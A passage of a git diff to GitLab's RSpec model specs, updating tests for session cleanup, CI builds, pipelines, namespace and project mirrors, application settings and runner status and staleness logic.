"session:user:gitlab:#{user.id}:#{max_number_of_sessions_plus_two}")) + expect(lookup_entries.count).to eq(active_count) + expect(lookup_entries).not_to include( + (active_count + 1).to_s, + (active_count + 2).to_s + ) end end + + it 'reports the removed entries' do + removed = [] + Gitlab::Redis::SharedState.with do |redis| + ActiveSession.cleaned_up_lookup_entries(redis, user, removed) + end + + expect(removed.count).to eq(2) + end + end + + context 'with legacy sessions' do + let(:session_key) { described_class.key_name_v1(user.id, current_session_id) } + + def key_name(user_id, session_id) + described_class.key_name_v1(user_id, session_id) + end + + def dump_session(session) + Marshal.dump(session) + end + + it_behaves_like 'cleaning up lookup entries' + end + + context 'with new sessions' do + let(:session_key) { described_class.key_name(user.id, current_session_id) } + + def key_name(user_id, session_id) + described_class.key_name(user_id, session_id) + end + + def dump_session(session) + session.dump + end + + it_behaves_like 'cleaning up lookup entries' end end end diff --git a/spec/models/analytics/cycle_analytics/project_stage_spec.rb b/spec/models/analytics/cycle_analytics/project_stage_spec.rb index 9efe90e7d41..a67f9fec443 100644 --- a/spec/models/analytics/cycle_analytics/project_stage_spec.rb +++ b/spec/models/analytics/cycle_analytics/project_stage_spec.rb @@ -29,4 +29,29 @@ RSpec.describe Analytics::CycleAnalytics::ProjectStage do let(:default_params) { { project: project } } end end + + describe '.distinct_stages_within_hierarchy' do + let_it_be(:top_level_group) { create(:group) } + let_it_be(:sub_group_1) { create(:group, parent: top_level_group) } + let_it_be(:sub_group_2) { create(:group, parent: sub_group_1) } + + let_it_be(:project_1) { create(:project, group: sub_group_1) } + let_it_be(:project_2) { create(:project, group: sub_group_2) } + let_it_be(:project_3) { create(:project, group: top_level_group) } + + let_it_be(:stage1) { create(:cycle_analytics_project_stage, project: project_1, start_event_identifier: :issue_created, end_event_identifier: :issue_deployed_to_production) } + let_it_be(:stage2) { create(:cycle_analytics_project_stage, project: project_3, start_event_identifier: :issue_created, end_event_identifier: :issue_deployed_to_production) } + + let_it_be(:stage3) { create(:cycle_analytics_project_stage, project: project_1, start_event_identifier: :merge_request_created, end_event_identifier: :merge_request_merged) } + let_it_be(:stage4) { create(:cycle_analytics_project_stage, project: project_3, start_event_identifier: :merge_request_created, end_event_identifier: :merge_request_merged) } + + subject(:distinct_start_and_end_event_identifiers) { described_class.distinct_stages_within_hierarchy(top_level_group).to_a.pluck(:start_event_identifier, :end_event_identifier) } + + it 'returns distinct stages by start and end events (using stage_event_hash_id)' do + expect(distinct_start_and_end_event_identifiers).to match_array([ + %w[issue_created issue_deployed_to_production], + %w[merge_request_created merge_request_merged] + ]) + end + end end diff --git a/spec/models/application_setting_spec.rb b/spec/models/application_setting_spec.rb index 8ad83da61f3..67314084c4f 100644 --- a/spec/models/application_setting_spec.rb +++ b/spec/models/application_setting_spec.rb @@ -247,6 +247,7 @@ RSpec.describe ApplicationSetting do end it { is_expected.to allow_value('grpc://example.org/spam_check').for(:spam_check_endpoint_url) } + it { is_expected.to allow_value('tls://example.org/spam_check').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value('https://example.org/spam_check').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value('nonsense').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value(nil).for(:spam_check_endpoint_url) } @@ -259,6 +260,7 @@ RSpec.describe ApplicationSetting do end it { is_expected.to allow_value('grpc://example.org/spam_check').for(:spam_check_endpoint_url) } + it { is_expected.to allow_value('tls://example.org/spam_check').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value('https://example.org/spam_check').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value('nonsense').for(:spam_check_endpoint_url) } it { is_expected.to allow_value(nil).for(:spam_check_endpoint_url) } @@ -1239,4 +1241,30 @@ RSpec.describe ApplicationSetting do expect(subject.kroki_formats_excalidraw).to eq(true) end end + + describe '#static_objects_external_storage_auth_token=' do + subject { setting.static_objects_external_storage_auth_token = token } + + let(:token) { 'Test' } + + it 'stores an encrypted version of the token' do + subject + + expect(setting[:static_objects_external_storage_auth_token]).to be_nil + expect(setting[:static_objects_external_storage_auth_token_encrypted]).to be_present + expect(setting.static_objects_external_storage_auth_token).to eq('Test') + end + + context 'when token is empty' do + let(:token) { '' } + + it 'removes an encrypted version of the token' do + subject + + expect(setting[:static_objects_external_storage_auth_token]).to be_nil + expect(setting[:static_objects_external_storage_auth_token_encrypted]).to be_nil + expect(setting.static_objects_external_storage_auth_token).to be_nil + end + end + end end diff --git a/spec/models/bulk_imports/entity_spec.rb b/spec/models/bulk_imports/entity_spec.rb index cc66572cd6f..e5bbac62dcc 100644 --- a/spec/models/bulk_imports/entity_spec.rb +++ b/spec/models/bulk_imports/entity_spec.rb @@ -252,4 +252,60 @@ RSpec.describe BulkImports::Entity, type: :model do .to eq("/groups/#{entity.encoded_source_full_path}/export_relations/download?relation=test") end end + + describe '#entity_type' do + it 'returns entity type' do + group_entity = build(:bulk_import_entity) + project_entity = build(:bulk_import_entity, :project_entity) + + expect(group_entity.entity_type).to eq('group') + expect(project_entity.entity_type).to eq('project') + end + end + + describe '#project?' do + it 'returns true if project entity' do + group_entity = build(:bulk_import_entity) + project_entity = build(:bulk_import_entity, :project_entity) + + expect(group_entity.project?).to eq(false) + expect(project_entity.project?).to eq(true) + end + end + + describe '#group?' do + it 'returns true if group entity' do + group_entity = build(:bulk_import_entity) + project_entity = build(:bulk_import_entity, :project_entity) + + expect(group_entity.group?).to eq(true) + expect(project_entity.group?).to eq(false) + end + end + + describe '#base_resource_url_path' do + it 'returns base entity url path' do + entity = build(:bulk_import_entity) + + expect(entity.base_resource_url_path).to eq("/groups/#{entity.encoded_source_full_path}") + end + end + + describe '#wiki_url_path' do + it 'returns entity wiki url path' do + entity = build(:bulk_import_entity) + + expect(entity.wikis_url_path).to eq("/groups/#{entity.encoded_source_full_path}/wikis") + end + end + + describe '#update_service' do + it 'returns correct update service class' do + group_entity = build(:bulk_import_entity) + project_entity = build(:bulk_import_entity, :project_entity) + + expect(group_entity.update_service).to eq(::Groups::UpdateService) + expect(project_entity.update_service).to eq(::Projects::UpdateService) + end + end end diff --git a/spec/models/chat_name_spec.rb b/spec/models/chat_name_spec.rb index 67e0f98d147..1d2ad8b4dce 100644 --- a/spec/models/chat_name_spec.rb +++ b/spec/models/chat_name_spec.rb @@ -46,9 +46,5 @@ RSpec.describe ChatName do it_behaves_like 'it has loose foreign keys' do let(:factory_name) { :chat_name } - - before do - Ci::PipelineChatData # ensure that the referenced model is loaded - end end end diff --git a/spec/models/ci/build_spec.rb b/spec/models/ci/build_spec.rb index b7de8ca4337..b9a12339e61 100644 --- a/spec/models/ci/build_spec.rb +++ b/spec/models/ci/build_spec.rb @@ -29,7 +29,7 @@ RSpec.describe Ci::Build do it { is_expected.to have_one(:deployment) } it { is_expected.to have_one(:runner_session) } it { is_expected.to have_one(:trace_metadata) } - it { is_expected.to have_many(:terraform_state_versions).dependent(:nullify).inverse_of(:build) } + it { is_expected.to have_many(:terraform_state_versions).inverse_of(:build) } it { is_expected.to validate_presence_of(:ref) } @@ -1994,6 +1994,14 @@ RSpec.describe Ci::Build do it { is_expected.not_to be_retryable } end + + context 'when deployment is rejected' do + before do + build.drop!(:deployment_rejected) + end + + it { is_expected.not_to be_retryable } + end end end @@ -2498,7 +2506,7 @@ RSpec.describe Ci::Build do it { is_expected.to start_with(project.web_url[0..6]) } it { is_expected.to include(build.token) } it { is_expected.to include('gitlab-ci-token') } - it { is_expected.to include(project.web_url[7..-1]) } + it { is_expected.to include(project.web_url[7..]) } end context 'when token is empty' do @@ -3421,10 +3429,6 @@ RSpec.describe Ci::Build do end describe '#scoped_variables' do - before do - pipeline.clear_memoization(:predefined_vars_in_builder_enabled) - end - it 'records a prometheus metric' do histogram = double(:histogram) expect(::Gitlab::Ci::Pipeline::Metrics).to receive(:pipeline_builder_scoped_variables_histogram) @@ -3522,22 +3526,6 @@ RSpec.describe Ci::Build do build.scoped_variables end - - context 'when ci builder feature flag is disabled' do - before do - stub_feature_flags(ci_predefined_vars_in_builder: false) - end - - it 'does not delegate to the variable builders' do - expect_next_instance_of(Gitlab::Ci::Variables::Builder) do |builder| - expect(builder).not_to receive(:predefined_variables) - end - - build.scoped_variables - end - - it_behaves_like 'calculates scoped_variables' - end end describe '#simple_variables_without_dependencies' do @@ -3782,6 +3770,12 @@ RSpec.describe Ci::Build do build.enqueue end + + it 'queues BuildHooksWorker' do + expect(BuildHooksWorker).to receive(:perform_async).with(build.id) + + build.enqueue + end end describe 'state transition: pending: :running' do @@ -4474,7 +4468,7 @@ RSpec.describe Ci::Build do 'create' => 0, 'update' => 1, 'delete' => 0, - 'job_name' => build.options.dig(:artifacts, :name).to_s + 'job_name' => build.name ) ) ) @@ -5423,4 +5417,13 @@ RSpec.describe Ci::Build do expect(subject).to be true end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :ci_build } + end + + it_behaves_like 'cleanup by a loose foreign key' do + let!(:model) { create(:ci_build, user: create(:user)) } + let!(:parent) { model.user } + end end diff --git a/spec/models/ci/job_artifact_spec.rb b/spec/models/ci/job_artifact_spec.rb index d63f87e8943..38061e0975f 100644 --- a/spec/models/ci/job_artifact_spec.rb +++ b/spec/models/ci/job_artifact_spec.rb @@ -700,4 +700,8 @@ RSpec.describe Ci::JobArtifact do when changes or new entries are made. MSG end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :ci_job_artifact } + end end diff --git a/spec/models/ci/namespace_mirror_spec.rb b/spec/models/ci/namespace_mirror_spec.rb new file mode 100644 index 00000000000..b4c71f51377 --- /dev/null +++ b/spec/models/ci/namespace_mirror_spec.rb @@ -0,0 +1,94 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::NamespaceMirror do + let!(:group1) { create(:group) } + let!(:group2) { create(:group, parent: group1) } + let!(:group3) { create(:group, parent: group2) } + let!(:group4) { create(:group, parent: group3) } + + describe '.sync!' do + let!(:event) { namespace.sync_events.create! } + + subject(:sync) { described_class.sync!(event.reload) } + + context 'when namespace hierarchy does not exist in the first place' do + let(:namespace) { group3 } + + it 'creates the hierarchy' do + expect { sync }.to change { described_class.count }.from(0).to(1) + + expect(namespace.ci_namespace_mirror).to have_attributes(traversal_ids: [group1.id, group2.id, group3.id]) + end + end + + context 'when namespace hierarchy does already exist' do + let(:namespace) { group3 } + + before do + described_class.create!(namespace: namespace, traversal_ids: [namespace.id]) + end + + it 'updates the hierarchy' do + expect { sync }.not_to change { described_class.count } + + expect(namespace.ci_namespace_mirror).to have_attributes(traversal_ids: [group1.id, group2.id, group3.id]) + end + end + + # I did not extract this context to a `shared_context` because the behavior will change + # after implementing the TODO in `Ci::NamespaceMirror.sync!` + context 'changing the middle namespace' do + let(:namespace) { group2 } + + before do + described_class.create!(namespace_id: group1.id, traversal_ids: [group1.id]) + described_class.create!(namespace_id: group2.id, traversal_ids: [group1.id, group2.id]) + described_class.create!(namespace_id: group3.id, traversal_ids: [group1.id, group2.id, group3.id]) + described_class.create!(namespace_id: group4.id, traversal_ids: [group1.id, group2.id, group3.id, group4.id]) + + group2.update!(parent: nil) + end + + it 'updates hierarchies for the base but wait for events for the children' do + expect { sync }.not_to change { described_class.count } + + expect(group1.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group1.id]) + expect(group2.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id]) + expect(group3.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id, group3.id]) + expect(group4.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id, group3.id, group4.id]) + end + end + + context 'when the FFs sync_traversal_ids, use_traversal_ids and use_traversal_ids_for_ancestors are disabled' do + before do + stub_feature_flags(sync_traversal_ids: false, + use_traversal_ids: false, + use_traversal_ids_for_ancestors: false) + end + + context 'changing the middle namespace' do + let(:namespace) { group2 } + + before do + described_class.create!(namespace_id: group1.id, traversal_ids: [group1.id]) + described_class.create!(namespace_id: group2.id, traversal_ids: [group1.id, group2.id]) + described_class.create!(namespace_id: group3.id, traversal_ids: [group1.id, group2.id, group3.id]) + described_class.create!(namespace_id: group4.id, traversal_ids: [group1.id, group2.id, group3.id, group4.id]) + + group2.update!(parent: nil) + end + + it 'updates hierarchies for the base and descendants' do + expect { sync }.not_to change { described_class.count } + + expect(group1.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group1.id]) + expect(group2.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id]) + expect(group3.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id, group3.id]) + expect(group4.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id, group3.id, group4.id]) + end + end + end + end +end diff --git a/spec/models/ci/pending_build_spec.rb b/spec/models/ci/pending_build_spec.rb index ad711f5622f..abf0fb443bb 100644 --- a/spec/models/ci/pending_build_spec.rb +++ b/spec/models/ci/pending_build_spec.rb @@ -118,7 +118,7 @@ RSpec.describe Ci::PendingBuild do project.shared_runners_enabled = true end - context 'when ci_pending_builds_maintain_shared_runners_data is enabled' do + context 'when ci_pending_builds_maintain_denormalized_data is enabled' do it 'sets instance_runners_enabled to true' do described_class.upsert_from_build!(build) @@ -150,9 +150,9 @@ RSpec.describe Ci::PendingBuild do end end - context 'when ci_pending_builds_maintain_shared_runners_data is disabled' do + context 'when ci_pending_builds_maintain_denormalized_data is disabled' do before do - stub_feature_flags(ci_pending_builds_maintain_shared_runners_data: false) + stub_feature_flags(ci_pending_builds_maintain_denormalized_data: false) end it 'sets instance_runners_enabled to false' do @@ -168,7 +168,7 @@ RSpec.describe Ci::PendingBuild do subject(:ci_pending_build) { described_class.last } - context 'when ci_pending_builds_maintain_tags_data is enabled' do + context 'when ci_pending_builds_maintain_denormalized_data is enabled' do it 'sets tag_ids' do described_class.upsert_from_build!(build) @@ -176,9 +176,9 @@ RSpec.describe Ci::PendingBuild do end end - context 'when ci_pending_builds_maintain_tags_data is disabled' do + context 'when ci_pending_builds_maintain_denormalized_data is disabled' do before do - stub_feature_flags(ci_pending_builds_maintain_tags_data: false) + stub_feature_flags(ci_pending_builds_maintain_denormalized_data: false) end it 'does not set tag_ids' do diff --git a/spec/models/ci/pipeline_spec.rb b/spec/models/ci/pipeline_spec.rb index e573a6ef780..fd9970699d7 100644 --- a/spec/models/ci/pipeline_spec.rb +++ b/spec/models/ci/pipeline_spec.rb @@ -28,6 +28,7 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do it { is_expected.to have_many(:trigger_requests) } it { is_expected.to have_many(:variables) } it { is_expected.to have_many(:builds) } + it { is_expected.to have_many(:statuses_order_id_desc) } it { is_expected.to have_many(:bridges) } it { is_expected.to have_many(:job_artifacts).through(:builds) } it { is_expected.to have_many(:auto_canceled_pipelines) } @@ -35,8 +36,6 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do it { is_expected.to have_many(:sourced_pipelines) } it { is_expected.to have_many(:triggered_pipelines) } it { is_expected.to have_many(:pipeline_artifacts) } - it { is_expected.to have_many(:package_build_infos).dependent(:nullify).inverse_of(:pipeline) } - it { is_expected.to have_many(:package_file_build_infos).dependent(:nullify).inverse_of(:pipeline) } it { is_expected.to have_one(:chat_data) } it { is_expected.to have_one(:source_pipeline) } @@ -757,23 +756,23 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do context 'with multiple pipelines' do before_all do create(:ci_build, name: "rspec", coverage: 30, pipeline: pipeline) - create(:ci_build, name: "rubocop", coverage: 40, pipeline: pipeline) + create(:ci_build, name: "rubocop", coverage: 35, pipeline: pipeline) end it "calculates average when there are two builds with coverage" do - expect(pipeline.coverage).to eq("35.00") + expect(pipeline.coverage).to be_within(0.001).of(32.5) end it "calculates average when there are two builds with coverage and one with nil" do create(:ci_build, pipeline: pipeline) - expect(pipeline.coverage).to eq("35.00") + expect(pipeline.coverage).to be_within(0.001).of(32.5) end it "calculates average when there are two builds with coverage and one is retried" do create(:ci_build, name: "rubocop", coverage: 30, pipeline: pipeline, retried: true) - expect(pipeline.coverage).to eq("35.00") + expect(pipeline.coverage).to be_within(0.001).of(32.5) end end @@ -1358,12 +1357,26 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do describe 'synching status to Jira' do let(:worker) { ::JiraConnect::SyncBuildsWorker } - %i[prepare! run! skip! drop! succeed! cancel! block! delay!].each do |event| - context "when we call pipeline.#{event}" do - it 'triggers a Jira synch worker' do - expect(worker).to receive(:perform_async).with(pipeline.id, Integer) + context 'when Jira Connect subscription does not exist' do + it 'does not trigger a Jira synch worker' do + expect(worker).not_to receive(:perform_async) - pipeline.send(event) + pipeline.prepare! + end + end + + context 'when Jira Connect subscription exists' do + before_all do + create(:jira_connect_subscription, namespace: project.namespace) + end + + %i[prepare! run! skip! drop! succeed! cancel! block! delay!].each do |event| + context "when we call pipeline.#{event}" do + it 'triggers a Jira synch worker' do + expect(worker).to receive(:perform_async).with(pipeline.id, Integer) + + pipeline.send(event) + end end end end @@ -1503,10 +1516,30 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do end describe 'pipeline caching' do - it 'performs ExpirePipelinesCacheWorker' do - expect(ExpirePipelineCacheWorker).to receive(:perform_async).with(pipeline.id) + context 'when expire_job_and_pipeline_cache_synchronously is enabled' do + before do + stub_feature_flags(expire_job_and_pipeline_cache_synchronously: true) + end - pipeline.cancel + it 'executes Ci::ExpirePipelineCacheService' do + expect_next_instance_of(Ci::ExpirePipelineCacheService) do |service| + expect(service).to receive(:execute).with(pipeline) + end + + pipeline.cancel + end + end + + context 'when expire_job_and_pipeline_cache_synchronously is disabled' do + before do + stub_feature_flags(expire_job_and_pipeline_cache_synchronously: false) + end + + it 'performs ExpirePipelinesCacheWorker' do + expect(ExpirePipelineCacheWorker).to receive(:perform_async).with(pipeline.id) + + pipeline.cancel + end end end @@ -3173,11 +3206,35 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do context 'when pipeline is not child nor parent' do let_it_be(:pipeline) { create(:ci_pipeline, :created) } - let_it_be(:build) { create(:ci_build, :with_deployment, :deploy_to_production, pipeline: pipeline) } + let_it_be(:build, refind: true) { create(:ci_build, :with_deployment, :deploy_to_production, pipeline: pipeline) } it 'returns just the pipeline environment' do expect(subject).to contain_exactly(build.deployment.environment) end + + context 'when deployment SHA is not matched' do + before do + build.deployment.update!(sha: 'old-sha') + end + + it 'does not return environments' do + expect(subject).to be_empty + end + end + end + + context 'when an associated environment does not have deployments' do + let_it_be(:pipeline) { create(:ci_pipeline, :created) } + let_it_be(:build) { create(:ci_build, :stop_review_app, pipeline: pipeline) } + let_it_be(:environment) { create(:environment, project: pipeline.project) } + + before_all do + build.metadata.update!(expanded_environment_name: environment.name) + end + + it 'does not return environments' do + expect(subject).to be_empty + end end context 'when pipeline is in extended family' do @@ -4611,4 +4668,13 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do expect(pipeline.authorized_cluster_agents).to contain_exactly(agent) # cached end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :ci_pipeline } + end + + it_behaves_like 'cleanup by a loose foreign key' do + let!(:model) { create(:ci_pipeline, user: create(:user)) } + let!(:parent) { model.user } + end end diff --git a/spec/models/ci/project_mirror_spec.rb b/spec/models/ci/project_mirror_spec.rb new file mode 100644 index 00000000000..199285b036c --- /dev/null +++ b/spec/models/ci/project_mirror_spec.rb @@ -0,0 +1,36 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::ProjectMirror do + let_it_be(:group1) { create(:group) } + let_it_be(:group2) { create(:group) } + + let!(:project) { create(:project, namespace: group2) } + + describe '.sync!' do + let!(:event) { Projects::SyncEvent.create!(project: project) } + + subject(:sync) { described_class.sync!(event.reload) } + + context 'when project hierarchy does not exist in the first place' do + it 'creates a ci_projects record' do + expect { sync }.to change { described_class.count }.from(0).to(1) + + expect(project.ci_project_mirror).to have_attributes(namespace_id: group2.id) + end + end + + context 'when project hierarchy does already exist' do + before do + described_class.create!(project_id: project.id, namespace_id: group1.id) + end + + it 'updates the related ci_projects record' do + expect { sync }.not_to change { described_class.count } + + expect(project.ci_project_mirror).to have_attributes(namespace_id: group2.id) + end + end + end +end diff --git a/spec/models/ci/runner_namespace_spec.rb b/spec/models/ci/runner_namespace_spec.rb index 4e7cf7a3cb3..41d805adb9f 100644 --- a/spec/models/ci/runner_namespace_spec.rb +++ b/spec/models/ci/runner_namespace_spec.rb @@ -4,12 +4,6 @@ require 'spec_helper' RSpec.describe Ci::RunnerNamespace do it_behaves_like 'includes Limitable concern' do - before do - skip_default_enabled_yaml_check - - stub_feature_flags(ci_runner_limits_override: false) - end - subject { build(:ci_runner_namespace, group: create(:group, :nested), runner: create(:ci_runner, :group)) } end end diff --git a/spec/models/ci/runner_project_spec.rb b/spec/models/ci/runner_project_spec.rb index fef1416a84a..13369dba2cf 100644 --- a/spec/models/ci/runner_project_spec.rb +++ b/spec/models/ci/runner_project_spec.rb @@ -4,12 +4,6 @@ require 'spec_helper' RSpec.describe Ci::RunnerProject do it_behaves_like 'includes Limitable concern' do - before do - skip_default_enabled_yaml_check - - stub_feature_flags(ci_runner_limits_override: false) - end - subject { build(:ci_runner_project, project: create(:project), runner: create(:ci_runner, :project)) } end end diff --git a/spec/models/ci/runner_spec.rb b/spec/models/ci/runner_spec.rb index 2e79159cc60..5142f70fa2c 100644 --- a/spec/models/ci/runner_spec.rb +++ b/spec/models/ci/runner_spec.rb @@ -7,10 +7,6 @@ RSpec.describe Ci::Runner do it_behaves_like 'it has loose foreign keys' do let(:factory_name) { :ci_runner } - - before do - Clusters::Applications::Runner # ensure that the referenced model is loaded - end end describe 'groups association' do @@ -298,26 +294,134 @@ RSpec.describe Ci::Runner do describe '.recent' do subject { described_class.recent } + let!(:runner1) { create(:ci_runner, :instance, contacted_at: nil, created_at: 2.months.ago) } + let!(:runner2) { create(:ci_runner, :instance, contacted_at: nil, created_at: 3.months.ago) } + let!(:runner3) { create(:ci_runner, :instance, contacted_at: 1.month.ago, created_at: 2.months.ago) } + let!(:runner4) { create(:ci_runner, :instance, contacted_at: 1.month.ago, created_at: 3.months.ago) } + + it { is_expected.to eq([runner1, runner3, runner4])} + end + + describe '.active' do + subject { described_class.active(active_value) } + + let!(:runner1) { create(:ci_runner, :instance, active: false) } + let!(:runner2) { create(:ci_runner, :instance) } + + context 'with active_value set to false' do + let(:active_value) { false } + + it 'returns inactive runners' do + is_expected.to match_array([runner1]) + end + end + + context 'with active_value set to true' do + let(:active_value) { true } + + it 'returns active runners' do + is_expected.to match_array([runner2]) + end + end + end + + describe '.paused' do before do - @runner1 = create(:ci_runner, :instance, contacted_at: nil, created_at: 2.months.ago) - @runner2 = create(:ci_runner, :instance, contacted_at: nil, created_at: 3.months.ago) - @runner3 = create(:ci_runner, :instance, contacted_at: 1.month.ago, created_at: 2.months.ago) - @runner4 = create(:ci_runner, :instance, contacted_at: 1.month.ago, created_at: 3.months.ago) - @runner5 = create(:ci_runner, :instance, contacted_at: 3.months.ago, created_at: 5.months.ago) + expect(described_class).to receive(:active).with(false).and_call_original end - it { is_expected.to eq([@runner1, @runner3, @runner4])} + subject { described_class.paused } + + let!(:runner1) { create(:ci_runner, :instance, active: false) } + let!(:runner2) { create(:ci_runner, :instance) } + + it 'returns inactive runners' do + is_expected.to match_array([runner1]) + end end - describe '.online' do - subject { described_class.online } + describe '.stale' do + subject { described_class.stale } + + let!(:runner1) { create(:ci_runner, :instance, created_at: 4.months.ago, contacted_at: 3.months.ago + 10.seconds) } + let!(:runner2) { create(:ci_runner, :instance, created_at: 4.months.ago, contacted_at: 3.months.ago - 1.second) } + let!(:runner3) { create(:ci_runner, :instance, created_at: 3.months.ago - 1.second, contacted_at: nil) } + let!(:runner4) { create(:ci_runner, :instance, created_at: 2.months.ago, contacted_at: nil) } + + it 'returns stale runners' do + is_expected.to match_array([runner2, runner3]) + end + end + + describe '#stale?', :clean_gitlab_redis_cache do + let(:runner) { create(:ci_runner, :instance) } + + subject { runner.stale? } before do - @runner1 = create(:ci_runner, :instance, contacted_at: 2.hours.ago) - @runner2 = create(:ci_runner, :instance, contacted_at: 1.second.ago) + allow_any_instance_of(described_class).to receive(:cached_attribute).and_call_original + allow_any_instance_of(described_class).to receive(:cached_attribute) + .with(:platform).and_return("darwin") end - it { is_expected.to eq([@runner2])} + context 'table tests' do + using RSpec::Parameterized::TableSyntax + + where(:created_at, :contacted_at, :expected_stale?) do + nil | nil | false + 3.months.ago - 1.second | 3.months.ago - 0.001.seconds | true + 3.months.ago - 1.second | 3.months.ago + 1.hour | false + 3.months.ago - 1.second | nil | true + 3.months.ago + 1.hour | nil | false + end + + with_them do + before do + runner.created_at = created_at + end + + context 'no cache value' do + before do + stub_redis_runner_contacted_at(nil) + runner.contacted_at = contacted_at + end + + specify do + is_expected.to eq(expected_stale?) + end + end + + context 'with cache value' do + before do + runner.contacted_at = contacted_at ? contacted_at + 1.week : nil + stub_redis_runner_contacted_at(contacted_at.to_s) + end + + specify do + is_expected.to eq(expected_stale?) + end + end + + def stub_redis_runner_contacted_at(value) + return unless created_at + + Gitlab::Redis::Cache.with do |redis| + cache_key = runner.send(:cache_attribute_key) + expect(redis).to receive(:get).with(cache_key) + .and_return({ contacted_at: value }.to_json).at_least(:once) + end + end + end + end + end + + describe '.online' do + subject { described_class.online } + + let!(:runner1) { create(:ci_runner, :instance, contacted_at: 2.hours.ago) } + let!(:runner2) { create(:ci_runner, :instance, contacted_at: 1.second.ago) } + + it { is_expected.to match_array([runner2]) } end describe '#online?', :clean_gitlab_redis_cache do @@ -344,7 +448,7 @@ RSpec.describe Ci::Runner do it { is_expected.to be_falsey } end - context 'contacted long time ago time' do + context 'contacted long time ago' do before do runner.contacted_at = 1.year.ago end @@ -362,7 +466,7 @@ RSpec.describe Ci::Runner do end context 'with cache value' do - context 'contacted long time ago time' do + context 'contacted long time ago' do before do runner.contacted_at = 1.year.ago stub_redis_runner_contacted_at(1.year.ago.to_s) @@ -393,12 +497,10 @@ RSpec.describe Ci::Runner do describe '.offline' do subject { described_class.offline } - before do - @runner1 = create(:ci_runner, :instance, contacted_at: 2.hours.ago) - @runner2 = create(:ci_runner, :instance, contacted_at: 1.second.ago) - end + let!(:runner1) { create(:ci_runner, :instance, contacted_at: 2.hours.ago) } + let!(:runner2) { create(:ci_runner, :instance, contacted_at: 1.second.ago) } - it { is_expected.to eq([@runner1])} + it { is_expected.to eq([runner1]) } end describe '#tick_runner_queue' do @@ -626,16 +728,33 @@ RSpec.describe Ci::Runner do end describe '#status' do - let(:runner) { build(:ci_runner, :instance) } + let(:runner) { build(:ci_runner, :instance, created_at: 4.months.ago) } + let(:legacy_mode) { } - subject { runner.status } + subject { runner.status(legacy_mode) } context 'never connected' do before do runner.contacted_at = nil end - it { is_expected.to eq(:not_connected) } + context 'with legacy_mode enabled' do + let(:legacy_mode) { '14.5' } + + it { is_expected.to eq(:not_connected) } + end + + context 'with legacy_mode disabled' do + it { is_expected.to eq(:stale) } + end + + context 'created recently' do + before do + runner.created_at = 1.day.ago + end + + it { is_expected.to eq(:never_contacted) } + end end context 'inactive but online' do @@ -644,7 +763,15 @@ RSpec.describe Ci::Runner do runner.active = false end - it { is_expected.to eq(:online) } + context 'with legacy_mode enabled' do + let(:legacy_mode) { '14.5' } + + it { is_expected.to eq(:paused) } + end + + context 'with legacy_mode disabled' do + it { is_expected.to eq(:online) } + end end context 'contacted 1s ago' do @@ -655,13 +782,29 @@ RSpec.describe Ci::Runner do it { is_expected.to eq(:online) } end - context 'contacted long time ago' do + context 'contacted recently' do before do - runner.contacted_at = 1.year.ago + runner.contacted_at = (3.months - 1.hour).ago end it { is_expected.to eq(:offline) } end + + context 'contacted long time ago' do + before do + runner.contacted_at = (3.months + 1.second).ago + end + + context 'with legacy_mode enabled' do + let(:legacy_mode) { '14.5' } + + it { is_expected.to eq(:offline) } + end + + context 'with legacy_mode disabled' do + it { is_expected.to eq(:stale) } + end + end end describe '#deprecated_rest_status' do @@ -760,8 +903,9 @@ RSpec.describe Ci::Runner do describe '#heartbeat' do let(:runner) { create(:ci_runner, :project) } + let(:executor) { 'shell' } - subject { runner.heartbeat(architecture: '18-bit', config: { gpus: "all" }) } + subject { runner.heartbeat(architecture: '18-bit', config: { gpus: "all" }, executor: executor) } context 'when database was updated recently' do before do @@ -797,6 +941,26 @@ RSpec.describe Ci::Runner do expect_redis_update does_db_update end + + %w(custom shell docker docker-windows docker-ssh ssh parallels virtualbox docker+machine docker-ssh+machine kubernetes some-unknown-type).each do |executor| + context "with #{executor} executor" do + let(:executor) { executor } + + it 'updates with expected executor type' do + expect_redis_update + + subject + + expect(runner.reload.read_attribute(:executor_type)).to eq(expected_executor_type) + end + + def expected_executor_type + return 'unknown' if executor == 'some-unknown-type' + + executor.gsub(/[+-]/, '_') + end + end + end end def expect_redis_update @@ -810,6 +974,7 @@ RSpec.describe Ci::Runner do expect { subject }.to change { runner.reload.read_attribute(:contacted_at) } .and change { runner.reload.read_attribute(:architecture) } .and change { runner.reload.read_attribute(:config) } + .and change { runner.reload.read_attribute(:executor_type) } end end @@ -1194,31 +1359,43 @@ RSpec.describe Ci::Runner do end describe '.belonging_to_group' do - it 'returns the specific group runner' do - group = create(:group) - runner = create(:ci_runner, :group, groups: [group]) - unrelated_group = create(:group) - create(:ci_runner, :group, groups: [unrelated_group]) + shared_examples 'returns group runners' do + it 'returns the specific group runner' do + group = create(:group) + runner = create(:ci_runner, :group, groups: [group]) + unrelated_group = create(:group) + create(:ci_runner, :group, groups: [unrelated_group]) - expect(described_class.belonging_to_group(group.id)).to contain_exactly(runner) - end + expect(described_class.belonging_to_group(group.id)).to contain_exactly(runner) + end - context 'runner belonging to parent group' do 